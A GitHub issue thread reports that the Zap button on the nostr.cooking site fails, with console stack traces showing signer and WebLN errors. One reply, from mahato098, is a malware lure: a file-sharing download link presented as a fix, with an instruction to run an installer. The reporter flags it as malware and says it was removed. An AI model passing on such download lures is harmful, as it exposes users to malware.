### ISSUE TITLE
Zaps are broken

### ISSUE THREAD

**Issue by dtonon** [github-tijlxyz/nostr.cooking#24]
If the user is _not_ logged-in, pressing the "Zap" button in the modal does nothing, and in console you can find this error:

```
nostr.9a321a6b.js:76 Uncaught (in promise) 
Error: Signer required
    at NDK.assertSigner (nostr.9a321a6b.js:76:49039)
    at Yr.zap (nostr.9a321a6b.js:76:13809)
    at T (14.07005857.js:14:2631)
    at HTMLButtonElement.d (index.e4441915.js:17:4123)
    at scheduler.b5a039a3.js:1:1954
    at Array.forEach (<anonymous>)
    at HTMLButtonElement.Y (scheduler.b5a039a3.js:1:1941)
    at HTMLButtonElement.a (Button.c37a2520.js:1:1290)
﻿
```

If the user is logged-in, also here no feedback when the button is pressed, and in console you find:

```

error while handleing zap t: Your browser has no WebLN provider
    at https://zap.cooking/_app/immutable/chunks/index.e4441915.js:19:1250
    at new Promise (<anonymous>)
    at Object.Dt (https://zap.cooking/_app/immutable/chunks/index.e4441915.js:19:1110)
    at T (https://zap.cooking/_app/immutable/nodes/14.07005857.js:14:2668)
```

In both cases I expected to see a simple LN invoice/qrcode to finalize the zap.

---

Enviroment: Chromium on macOS

**Comment by mahato098** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by dtonon** [comment]
Please delete mahato098's comment, he is spreading malware.

(reported, github deleted it)
